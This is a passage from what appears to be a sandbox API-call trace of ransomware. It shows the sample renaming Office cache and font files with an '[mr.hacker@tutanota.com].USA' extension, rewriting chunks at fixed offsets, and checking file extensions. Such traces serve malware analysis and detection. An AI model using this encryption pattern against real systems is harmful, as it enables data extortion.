(lpString="ACEWSS.DLL") returned 10 [0060.908] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEWSS.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\acewss.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) Thread: id = 16 os_tid = 0x9bc [0034.619] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x10000) returned 0x37f02a0 [0034.619] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x10000) returned 0x38002a8 [0034.619] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x10) returned 0x670298 [0034.619] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x6) returned 0x6240d8 [0034.620] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x10) returned 0x6702b0 [0034.620] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x100000) returned 0x3bc0020 [0034.620] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x10) returned 0x6702c8 [0034.620] RtlReAllocateHeap (Heap=0x5d0000, Flags=0x0, Ptr=0x6702c8, Size=0x20) returned 0x626870 [0034.620] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x10) returned 0x6702c8 [0034.620] RtlReAllocateHeap (Heap=0x5d0000, Flags=0x0, Ptr=0x6702c8, Size=0x20) returned 0x626848 [0034.620] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76c20000 [0034.620] GetProcAddress (hModule=0x76c20000, lpProcName="Wow64DisableWow64FsRedirection") returned 0x76c4d650 [0034.620] Wow64DisableWow64FsRedirection (in: OldValue=0x32bff58 | out: OldValue=0x32bff58*=0x0) returned 1 [0034.620] lstrlenW (lpString="kernel32.dll") returned 12 [0034.620] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x626870 | out: hHeap=0x5d0000) returned 1 [0034.620] lstrlenA (lpString="Wow64DisableWow64FsRedirection") returned 30 [0034.620] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x626848 | out: hHeap=0x5d0000) returned 1 [0034.620] Sleep (dwMilliseconds=0x64) [0034.939] lstrcmpiW (lpString1=".ttf", lpString2=".USA") returned -1 [0034.939] lstrlenW (lpString="jpn_boot.ttf") returned 12 [0034.939] CreateFileW (lpFileName="C:\\Boot\\Fonts\\jpn_boot.ttf" (normalized: "c:\\boot\\fonts\\jpn_boot.ttf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1b4 [0035.407] GetFileSizeEx (in: hFile=0x1b4, lpFileSize=0x32bff1c | out: lpFileSize=0x32bff1c*=1984228) returned 1 [0035.407] CloseHandle (hObject=0x1b4) returned 1 [0035.407] GetFileAttributesW (lpFileName="C:\\Boot\\Fonts\\jpn_boot.ttf" (normalized: "c:\\boot\\fonts\\jpn_boot.ttf")) returned 0x20 [0035.407] GetFileAttributesW (lpFileName="C:\\Boot\\Fonts\\jpn_boot.ttf.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\boot\\fonts\\jpn_boot.ttf.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0035.407] MoveFileW (lpExistingFileName="C:\\Boot\\Fonts\\jpn_boot.ttf" (normalized: "c:\\boot\\fonts\\jpn_boot.ttf"), lpNewFileName="C:\\Boot\\Fonts\\jpn_boot.ttf.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\boot\\fonts\\jpn_boot.ttf.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0 [0035.407] lstrlenW (lpString="C:\\Boot\\Fonts\\jpn_boot.ttf") returned 26 [0035.407] lstrlenW (lpString="C:\\Boot\\Fonts\\jpn_boot.ttf") returned 26 [0035.407] lstrlenW (lpString=".doc") returned 4 [0035.407] lstrcmpiW (lpString1=".doc", lpString2=".ttf") returned -1 [0035.407] lstrlenW (lpString=".docx") returned 5 [0035.407] lstrcmpiW (lpString1=".docx", lpString2="t.ttf") returned -1 [0035.407] lstrlenW (lpString=".pdf") returned 4 [0035.407] lstrcmpiW (lpString1=".pdf", lpString2=".ttf") returned -1 [0035.407] lstrlenW (lpString=".xls") returned 4 [0035.407] lstrcmpiW (lpString1=".xls", lpString2=".ttf") returned 1 [0035.407] lstrlenW (lpString=".xlsx") returned 5 [0035.407] lstrcmpiW (lpString1=".xlsx", lpString2="t.ttf") returned -1 [0035.407] lstrlenW (lpString=".ppt") returned 4 [0035.407] lstrcmpiW (lpString1=".ppt", lpString2=".ttf") returned -1 [0035.407] lstrlenW (lpString="C:\\Boot\\Fonts\\jpn_boot.ttf") returned 26 [0035.407] lstrlenW (lpString=".zip") returned 4 [0035.407] lstrcmpiW (lpString1=".zip", lpString2=".ttf") returned 1 [0035.407] lstrlenW (lpString=".rar") returned 4 [0035.407] lstrcmpiW (lpString1=".rar", lpString2=".ttf") returned -1 [0035.408] lstrlenW (lpString=".bz2") returned 4 [0035.408] lstrcmpiW (lpString1=".bz2", lpString2=".ttf") returned -1 [0035.408] lstrlenW (lpString=".7z") returned 3 [0035.408] lstrcmpiW (lpString1=".7z", lpString2="ttf") returned -1 [0035.408] lstrlenW (lpString="C:\\Boot\\Fonts\\jpn_boot.ttf") returned 26 [0035.408] lstrlenW (lpString=".dbf") returned 4 [0035.408] lstrcmpiW (lpString1=".dbf", lpString2=".ttf") returned -1 [0035.408] lstrlenW (lpString="C:\\Boot\\Fonts\\jpn_boot.ttf") returned 26 [0035.408] lstrlenW (lpString=".1cd") returned 4 [0035.408] lstrcmpiW (lpString1=".1cd", lpString2=".ttf") returned -1 [0035.408] lstrlenW (lpString="C:\\Boot\\Fonts\\jpn_boot.ttf") returned 26 [0035.408] lstrlenW (lpString=".jpg") returned 4 [0035.408] lstrcmpiW (lpString1=".jpg", lpString2=".ttf") returned -1 [0035.408] lstrlenW (lpString="C:\\Boot\\Fonts\\jpn_boot.ttf") returned 26 [0035.408] lstrlenW (lpString="C:\\Boot\\Fonts\\jpn_boot.ttf") returned 26 [0035.408] lstrlenW (lpString=".doc") returned 4 [0035.408] lstrcmpiW (lpString1=".doc", lpString2=".ttf") returned -1 [0035.408] lstrlenW (lpString=".docx") returned 5 [0035.408] lstrcmpiW (lpString1=".docx", lpString2="t.ttf") returned -1 [0035.408] lstrlenW (lpString=".pdf") returned 4 [0035.408] lstrcmpiW (lpString1=".pdf", lpString2=".ttf") returned -1 [0035.408] lstrlenW (lpString=".xls") returned 4 [0035.408] lstrcmpiW (lpString1=".xls", lpString2=".ttf") returned 1 [0035.408] lstrlenW (lpString=".xlsx") returned 5 [0035.408] lstrcmpiW (lpString1=".xlsx", lpString2="t.ttf") returned -1 [0035.408] lstrlenW (lpString=".ppt") returned 4 [0035.408] lstrcmpiW (lpString1=".ppt", lpString2=".ttf") returned -1 [0035.408] lstrlenW (lpString="C:\\Boot\\Fonts\\jpn_boot.ttf") returned 26 [0035.408] lstrlenW (lpString=".zip") returned 4 [0035.408] lstrcmpiW (lpString1=".zip", lpString2=".ttf") returned 1 [0035.408] lstrlenW (lpString=".rar") returned 4 [0035.409] lstrcmpiW (lpString1=".rar", lpString2=".ttf") returned -1 [0035.409] lstrlenW (lpString=".bz2") returned 4 [0035.409] lstrcmpiW (lpString1=".bz2", lpString2=".ttf") returned -1 [0035.409] lstrlenW (lpString=".7z") returned 3 [0035.409] lstrcmpiW (lpString1=".7z", lpString2="ttf") returned -1 [0035.409] lstrlenW (lpString="C:\\Boot\\Fonts\\jpn_boot.ttf") returned 26 [0035.409] lstrlenW (lpString=".dbf") returned 4 [0035.409] lstrcmpiW (lpString1=".dbf", lpString2=".ttf") returned -1 [0035.409] lstrlenW (lpString="C:\\Boot\\Fonts\\jpn_boot.ttf") returned 26 [0035.409] lstrlenW (lpString=".1cd") returned 4 [0035.409] lstrcmpiW (lpString1=".1cd", lpString2=".ttf") returned -1 [0035.409] lstrlenW (lpString="C:\\Boot\\Fonts\\jpn_boot.ttf") returned 26 [0035.409] lstrlenW (lpString=".jpg") returned 4 [0035.409] lstrcmpiW (lpString1=".jpg", lpString2=".ttf") returned -1 [0035.409] lstrcmpiW (lpString1=".cab", lpString2=".USA") returned -1 [0035.409] lstrlenW (lpString="PptLR.cab") returned 9 [0035.409] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PptLR.cab" (normalized: "c:\\msocache\\all users\\{90140000-0018-0409-1000-0000000ff1ce}-c\\pptlr.cab"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x19c [0035.599] GetFileSizeEx (in: hFile=0x19c, lpFileSize=0x32bff1c | out: lpFileSize=0x32bff1c*=70361744) returned 1 [0035.599] CloseHandle (hObject=0x19c) returned 1 [0035.599] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PptLR.cab" (normalized: "c:\\msocache\\all users\\{90140000-0018-0409-1000-0000000ff1ce}-c\\pptlr.cab")) returned 0x2020 [0035.599] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PptLR.cab.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\msocache\\all users\\{90140000-0018-0409-1000-0000000ff1ce}-c\\pptlr.cab.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0035.599] MoveFileW (lpExistingFileName="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PptLR.cab" (normalized: "c:\\msocache\\all users\\{90140000-0018-0409-1000-0000000ff1ce}-c\\pptlr.cab"), lpNewFileName="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PptLR.cab.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\msocache\\all users\\{90140000-0018-0409-1000-0000000ff1ce}-c\\pptlr.cab.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 1 [0035.600] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PptLR.cab.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\msocache\\all users\\{90140000-0018-0409-1000-0000000ff1ce}-c\\pptlr.cab.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x19c [0035.600] SetFilePointerEx (in: hFile=0x19c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x32bfc6c | out: lpNewFilePointer=0x0) returned 1 [0035.600] SetFilePointerEx (in: hFile=0x19c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x32bfc2c | out: lpNewFilePointer=0x0) returned 1 [0035.600] ReadFile (in: hFile=0x19c, lpBuffer=0x3bc0058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x32bfc38, lpOverlapped=0x0 | out: lpBuffer=0x3bc0058*, lpNumberOfBytesRead=0x32bfc38*=0x40000, lpOverlapped=0x0) returned 1 [0035.609] SetFilePointerEx (in: hFile=0x19c, liDistanceToMove=0x165e0da, lpNewFilePointer=0x0, dwMoveMethod=0x32bfc2c | out: lpNewFilePointer=0x0) returned 1 [0035.609] ReadFile (in: hFile=0x19c, lpBuffer=0x3c00058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x32bfc38, lpOverlapped=0x0 | out: lpBuffer=0x3c00058*, lpNumberOfBytesRead=0x32bfc38*=0x40000, lpOverlapped=0x0) returned 1 [0035.616] SetFilePointerEx (in: hFile=0x19c, liDistanceToMove=0xfffc0000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x32bfc6c | out: lpNewFilePointer=0xffffffff) returned 1 [0035.616] SetFilePointerEx (in: hFile=0x19c, liDistanceToMove=0x42da290, lpNewFilePointer=0x0, dwMoveMethod=0x32bfc2c | out: lpNewFilePointer=0x0) returned 1 [0035.616] ReadFile (in: hFile=0x19c, lpBuffer=0x3c40058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x32bfc38, lpOverlapped=0x0 | out: lpBuffer=0x3c40058*, lpNumberOfBytesRead=0x32bfc38*=0x40000, lpOverlapped=0x0) returned 1 [0035.967] SetFilePointerEx (in: hFile=0x19c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x32bfec8 | out: lpNewFilePointer=0x0) returned 1 [0035.968] WriteFile (in: hFile=0x19c, lpBuffer=0x3bc0020*, nNumberOfBytesToWrite=0xc00fe, lpNumberOfBytesWritten=0x32bfcb0, lpOverlapped=0x0 | out: lpBuffer=0x3bc0020*, lpNumberOfBytesWritten=0x32bfcb0*=0xc00fe, lpOverlapped=0x0) returned 1 [0035.982] SetEndOfFile (hFile=0x19c) returned 1 [0035.982] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x40000) returned 0x3fa70b0 [0036.104] SetFilePointerEx (in: hFile=0x19c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x32bfc7c | out: lpNewFilePointer=0x0) returned 1 [0036.104] WriteFile (in: hFile=0x19c, lpBuffer=0x3fa70b0*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x32bfc88, lpOverlapped=0x0 | out: lpBuffer=0x3fa70b0*, lpNumberOfBytesWritten=0x32bfc88*=0x40000, lpOverlapped=0x0) returned 1 [0036.104] SetFilePointerEx (in: hFile=0x19c, liDistanceToMove=0x165e0da, lpNewFilePointer=0x0, dwMoveMethod=0x32bfc7c | out: lpNewFilePointer=0x0) returned 1 [0036.104] WriteFile (in: hFile=0x19c, lpBuffer=0x3fa70b0*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x32bfc88, lpOverlapped=0x0 | out: lpBuffer=0x3fa70b0*, lpNumberOfBytesWritten=0x32bfc88*=0x40000, lpOverlapped=0x0) returned 1 [0036.105] SetFilePointerEx (in: hFile=0x19c, liDistanceToMove=0x42da290, lpNewFilePointer=0x0, dwMoveMethod=0x32bfc7c | out: lpNewFilePointer=0x0) returned 1 [0036.105] WriteFile (in: hFile=0x19c, lpBuffer=0x3fa70b0*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x32bfc88, lpOverlapped=0x0 | out: lpBuffer=0x3fa70b0*, lpNumberOfBytesWritten=0x32bfc88*=0x40000, lpOverlapped=0x0) returned 1 [0036.107] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x3fa70b0 | out: hHeap=0x5d0000) returned 1 [0036.107] CloseHandle (hObject=0x19c) returned 1 [0039.860] SetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PptLR.cab.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x2020) returned 1 [0039.860] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PptLR.cab") returned 72 [0039.860] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PptLR.cab") returned 72 [0039.860] lstrlenW (lpString=".doc") returned 4 [0039.860] lstrcmpiW (lpString1=".doc", lpString2=".cab") returned 1 [0039.860] lstrlenW (lpString=".docx") returned 5 [0039.860] lstrcmpiW (lpString1=".docx", lpString2="R.cab") returned -1 [0039.860] lstrlenW (lpString=".pdf") returned 4 [0039.861] lstrcmpiW (lpString1=".pdf", lpString2=".cab") returned 1 [0039.861] lstrlenW (lpString=".xls") returned 4 [0039.861] lstrcmpiW (lpString1=".xls", lpString2=".cab") returned 1 [0039.861] lstrlenW (lpString=".xlsx") returned 5 [0039.861] lstrcmpiW (lpString1=".xlsx", lpString2="R.cab") returned -1 [0039.861] lstrlenW (lpString=".ppt") returned 4 [0039.861] lstrcmpiW (lpString1=".ppt", lpString2=".cab") returned 1 [0039.861] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PptLR.cab") returned 72 [0039.861] lstrlenW (lpString=".zip") returned 4 [0039.861] lstrcmpiW (lpString1=".zip", lpString2=".cab") returned 1 [0039.861] lstrlenW (lpString=".rar") returned 4 [0039.861] lstrcmpiW (lpString1=".rar", lpString2=".cab") returned 1 [0039.861] lstrlenW (lpString=".bz2") returned 4 [0039.861] lstrcmpiW (lpString1=".bz2", lpString2=".cab") returned -1 [0039.861] lstrlenW (lpString=".7z") returned 3 [0039.861] lstrcmpiW (lpString1=".7z", lpString2="cab") returned -1 [0039.861] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PptLR.cab") returned 72 [0039.861] lstrlenW (lpString=".dbf") returned 4 [0039.861] lstrcmpiW (lpString1=".dbf", lpString2=".cab") returned 1 [0039.861] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PptLR.cab") returned 72 [0039.861] lstrlenW (lpString=".1cd") returned 4 [0039.861] lstrcmpiW (lpString1=".1cd", lpString2=".cab") returned -1 [0039.861] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PptLR.cab") returned 72 [0039.861] lstrlenW (lpString=".jpg") returned 4 [0039.861] lstrcmpiW (lpString1=".jpg", lpString2=".cab") returned 1 [0039.861] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PptLR.cab") returned 72 [0039.861] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PptLR.cab") returned 72 [0039.861] lstrlenW (lpString=".doc") returned 4 [0039.861] lstrcmpiW (lpString1=".doc", lpString2=".cab") returned 1 [0039.861] lstrlenW (lpString=".docx") returned 5 [0039.861] lstrcmpiW (lpString1=".docx", lpString2="R.cab") returned -1 [0039.861] lstrlenW (lpString=".pdf") returned 4 [0039.861] lstrcmpiW (lpString1=".pdf", lpString2=".cab") returned 1 [0039.861] lstrlenW (lpString=".xls") returned 4 [0039.861] lstrcmpiW (lpString1=".xls", lpString2=".cab") returned 1 [0039.862] lstrlenW (lpString=".xlsx") returned 5 [0039.862] lstrcmpiW (lpString1=".xlsx", lpString2="R.cab") returned -1 [0039.862] lstrlenW (lpString=".ppt") returned 4 [0039.862] lstrcmpiW (lpString1=".ppt", lpString2=".cab") returned 1 [0039.862] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PptLR.cab") returned 72 [0039.862] lstrlenW (lpString=".zip") returned 4 [0039.862] lstrcmpiW (lpString1=".zip", lpString2=".cab") returned 1 [0039.862] lstrlenW (lpString=".rar") returned 4 [0039.862] lstrcmpiW (lpString1=".rar", lpString2=".cab") returned 1 [0039.862] lstrlenW (lpString=".bz2") returned 4 [0039.862] lstrcmpiW (lpString1=".bz2", lpString2=".cab") returned -1 [0039.862] lstrlenW (lpString=".7z") returned 3 [0039.862] lstrcmpiW (lpString1=".7z", lpString2="cab") returned -1 [0039.862] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PptLR.cab") returned 72 [0039.862] lstrlenW (lpString=".dbf") returned 4 [0039.862] lstrcmpiW (lpString1=".dbf", lpString2=".cab") returned 1 [0039.862] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PptLR.cab") returned 72 [0039.862] lstrlenW (lpString=".1cd") returned 4 [0039.862] lstrcmpiW (lpString1=".1cd", lpString2=".cab") returned -1 [0039.862] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PptLR.cab") returned 72 [0039.862] lstrlenW (lpString=".jpg") returned 4 [0039.862] lstrcmpiW (lpString1=".jpg", lpString2=".cab") returned 1 [0039.862] lstrcmpiW (lpString1=".cab", lpString2=".USA") returned -1 [0039.862] lstrlenW (lpString="WordLR.cab") returned 10 [0039.862] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordLR.cab" (normalized: "c:\\msocache\\all users\\{90140000-001b-0409-1000-0000000ff1ce}-c\\wordlr.cab"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1d0 [0039.863] GetFileSizeEx (in: hFile=0x1d0, lpFileSize=0x32bff1c | out: lpFileSize=0x32bff1c*=43806141) returned 1 [0039.863] CloseHandle (hObject=0x1d0) returned 1 [0039.864] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordLR.cab" (normalized: "c:\\msocache\\all users\\{90140000-001b-0409-1000-0000000ff1ce}-c\\wordlr.cab")) returned 0x2020 [0039.865] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordLR.cab.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\msocache\\all users\\{90140000-001b-0409-1000-0000000ff1ce}-c\\wordlr.cab.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0039.865] MoveFileW (lpExistingFileName="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordLR.cab" (normalized: "c:\\msocache\\all users\\{90140000-001b-0409-1000-0000000ff1ce}-c\\wordlr.cab"), lpNewFileName="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordLR.cab.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\msocache\\all users\\{90140000-001b-0409-1000-0000000ff1ce}-c\\wordlr.cab.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 1 [0039.865] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordLR.cab.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\msocache\\all users\\{90140000-001b-0409-1000-0000000ff1ce}-c\\wordlr.cab.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1d0 [0039.865] SetFilePointerEx (in: hFile=0x1d0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x32bfc6c | out: lpNewFilePointer=0x0) returned 1 [0039.865] SetFilePointerEx (in: hFile=0x1d0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x32bfc2c | out: lpNewFilePointer=0x0) returned 1 [0039.865] ReadFile (in: hFile=0x1d0, lpBuffer=0x3bc0058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x32bfc38, lpOverlapped=0x0 | out: lpBuffer=0x3bc0058*, lpNumberOfBytesRead=0x32bfc38*=0x40000, lpOverlapped=0x0) returned 1 [0039.925] SetFilePointerEx (in: hFile=0x1d0, liDistanceToMove=0xdecf3f, lpNewFilePointer=0x0, dwMoveMethod=0x32bfc2c | out: lpNewFilePointer=0x0) returned 1 [0039.925] ReadFile (in: hFile=0x1d0, lpBuffer=0x3c00058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x32bfc38, lpOverlapped=0x0 | out: lpBuffer=0x3c00058*, lpNumberOfBytesRead=0x32bfc38*=0x40000, lpOverlapped=0x0) returned 1 [0039.930] SetFilePointerEx (in: hFile=0x1d0, liDistanceToMove=0xfffc0000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x32bfc6c | out: lpNewFilePointer=0xffffffff) returned 1 [0039.930] SetFilePointerEx (in: hFile=0x1d0, liDistanceToMove=0x2986dbd, lpNewFilePointer=0x0, dwMoveMethod=0x32bfc2c | out: lpNewFilePointer=0x0) returned 1 [0039.930] ReadFile (in: hFile=0x1d0, lpBuffer=0x3c40058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x32bfc38, lpOverlapped=0x0 | out: lpBuffer=0x3c40058*, lpNumberOfBytesRead=0x32bfc38*=0x40000, lpOverlapped=0x0) returned 1 [0039.957] SetFilePointerEx (in: hFile=0x1d0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x32bfec8 | out: lpNewFilePointer=0x0) returned 1 [0039.957] WriteFile (in: hFile=0x1d0, lpBuffer=0x3bc0020*, nNumberOfBytesToWrite=0xc0100, lpNumberOfBytesWritten=0x32bfcb0, lpOverlapped=0x0 | out: lpBuffer=0x3bc0020*, lpNumberOfBytesWritten=0x32bfcb0*=0xc0100, lpOverlapped=0x0) returned 1 [0040.236] SetEndOfFile (hFile=0x1d0) returned 1 [0040.236] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x40000) returned 0x3f10058 [0040.240] SetFilePointerEx (in: hFile=0x1d0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x32bfc7c | out: lpNewFilePointer=0x0) returned 1 [0040.240] WriteFile (in: hFile=0x1d0, lpBuffer=0x3f10058*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x32bfc88, lpOverlapped=0x0 | out: lpBuffer=0x3f10058*, lpNumberOfBytesWritten=0x32bfc88*=0x40000, lpOverlapped=0x0) returned 1 [0040.240] SetFilePointerEx (in: hFile=0x1d0, liDistanceToMove=0xdecf3f, lpNewFilePointer=0x0, dwMoveMethod=0x32bfc7c | out: lpNewFilePointer=0x0) returned 1 [0040.241] WriteFile (in: hFile=0x1d0, lpBuffer=0x3f10058*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x32bfc88, lpOverlapped=0x0 | out: lpBuffer=0x3f10058*, lpNumberOfBytesWritten=0x32bfc88*=0x40000, lpOverlapped=0x0) returned 1 [0040.243] SetFilePointerEx (in: hFile=0x1d0, liDistanceToMove=0x2986dbd, lpNewFilePointer=0x0, dwMoveMethod=0x32bfc7c | out: lpNewFilePointer=0x0) returned 1 [0040.243] WriteFile (in: hFile=0x1d0, lpBuffer=0x3f10058*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x32bfc88, lpOverlapped=0x0 | out: lpBuffer=0x3f10058*, lpNumberOfBytesWritten=0x32bfc88*=0x40000, lpOverlapped=0x0) returned 1 [0040.245] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x3f10058 | out: hHeap=0x5d0000) returned 1 [0040.245] CloseHandle (hObject=0x1d0) returned 1 [0042.311] SetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordLR.cab.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x2020) returned 1 [0042.311] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordLR.cab") returned 73 [0042.311] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordLR.cab") returned 73 [0042.311] lstrlenW (lpString=".doc") returned 4 [0042.311] lstrcmpiW (lpString1=".doc", lpString2=".cab") returned 1 [0042.311] lstrlenW (lpString=".docx") returned 5 [0042.311] lstrcmpiW (lpString1=".docx", lpString2="R.cab") returned -1 [0042.311] lstrlenW (lpString=".pdf") returned 4 [0042.312] lstrcmpiW (lpString1=".pdf", lpString2=".cab") returned 1 [0042.312] lstrlenW (lpString=".xls") returned 4 [0042.312] lstrcmpiW (lpString1=".xls", lpString2=".cab") returned 1 [0042.312] lstrlenW (lpString=".xlsx") returned 5 [0042.312] lstrcmpiW (lpString1=".xlsx", lpString2="R.cab") returned -1 [0042.312] lstrlenW (lpString=".ppt") returned 4 [0042.312] lstrcmpiW (lpString1=".ppt", lpString2=".cab") returned 1 [0042.312] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordLR.cab") returned 73 [0042.312] lstrlenW (lpString=".zip") returned 4 [0042.312] lstrcmpiW (lpString1=".zip", lpString2=".cab") returned 1 [0042.312] lstrlenW (lpString=".rar") returned 4 [0042.312] lstrcmpiW (lpString1=".rar", lpString2=".cab") returned 1 [0042.312] lstrlenW (lpString=".bz2") returned 4 [0042.312] lstrcmpiW (lpString1=".bz2", lpString2=".cab") returned -1 [0042.312] lstrlenW (lpString=".7z") returned 3 [0042.312] lstrcmpiW (lpString1=".7z", lpString2="cab") returned -1 [0042.312] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordLR.cab") returned 73 [0042.312] lstrlenW (lpString=".dbf") returned 4 [0042.312] lstrcmpiW (lpString1=".dbf", lpString2=".cab") returned 1 [0042.312] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordLR.cab") returned 73 [0042.312] lstrlenW (lpString=".1cd") returned 